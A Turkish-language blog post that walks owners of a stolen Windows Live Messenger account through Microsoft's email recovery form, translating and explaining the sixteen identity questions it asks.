İlk önce “https://support.microsoft.com/contactus/emailcontact.aspx?scid=sw;en;1310&ws=1prcen” adresine girin. Tüm sorular İngilizcedir. Tabi cevaplarda İngilizce olmak zorunda. Bu yüzden İngilizce bilmiyorsanız, bilen birinden mutlaka yardım alın. Gene bu adımda önemli bir nokta, “Product or Service” seçeneğinde mutlaka “Microsoft Password Network” seçeneğini seçin. Ayrıca en aşağıda bulunan “E-mail adres” kısmına çalınan Messenger mailinizi değil, Microsoft ile haberleşmede kullanacağınız farklı bir mail adresi girin. Genelde 3 veya 4 gün içinde cevap gelir.

Gelen e-mail’de ise çaldırdığınız Messenger hesabı ile ilgili 16 soru olacak. Bu soruları eksiksiz cevaplayıp, mailin geldiği adrese geri atmalısınız. Eğer verdiğiniz bilgiler doğru ise gene birkaç gün içerisinde Messenger şifrenizi ve gizli sorunuzu değiştirebileceğiniz bir link size bildirilecek. Oradaki adımları izleyerek, yeni şifrenizi ve gizli sorunuzu oluşturup, çaldırdığınız Messenger hesabınıza girebilirsiniz.

16 soru ve açıklaması:

1. Your Windows Live ID (Çalınan hesabınızın e-mail adresi)
2. Your first name and your last name (Adınız ve Soyadınız)
3. Your date of birth (month/date/year) (Doğum Tarihiniz Ay-gün-yıl)
4. Your country (Ülkeniz)
5. Your state (if applicable) (Yaşadığınız şehir)
6. Your postal code (Posta kodunuz)
7. Your IP address List the IP addresses from each computer that you use to access your account. To determine your IP address, visit the following Web site: http://www.whatismyip.com
The numbers that appear at the top of this Web page is your IP address. (Kullandığınız IP adresi)
8. The answer to your secret question (Hesabınız çalınmanda önceki gizli sorunuzun cevabı)
9. The “alternate e-mail address” that is on file for the account (Hesabınız çalınmadan önce verdiyseniz alternatif e-mail adresi)
10. Your Internet service provider. An ISP is a company that provides an end user with a connection to the Internet and other similar services, such as e-mail. Examples include MSNIA, EarthLink, and Comcast. (Biliyorsanız servis sağlayıcınızın adını girin. Ev kullanıcıları için genelde Türk Telekom’dur. İş yerleri ise farklı sağlayıcılar kullanabiliyor.)
11. The last date and time when you successfully signed in (Messenger’ınıza en son girdiğiniz saat ve tarih.)
12. The names of any folders that you created in addition to the default folders (Mail adresinizde varsa yarattığınız klasör isimleri)
13. Names of contacts in your address book (please include the e-mail address) (Mail hesabınızda ekli kişilerin Adı, soyadı ve mail adresleri. Tabi herkesi hatırlamanız mümkün değil. Ne kadar çok yazarsanız o kadar iyi.)
14. Subjects of any old mail that is in your Inbox or mail folders (Son gelen maillerinizin konuları. Ne kadar çok yazarsanız o kadar iyi.)
15. Names of contacts on your contact list (please include the e-mail address)( Messenger listenizde ekli kişilerin mail adresleri. Biliyorsanız kişilerin adı ve soyadlarını da ekleyebilirsiniz.)
16. Your Windows Live Messenger nickname (display name) (Messenger’da en son kullandığınız takma isminiz.)

Sayfa 1 ila 3123

Bu Site Sırtını WordPress'e Dayamıştır..! DüzenlemeLer Ferdi ANAR Tarafından Tasarlanmıştır.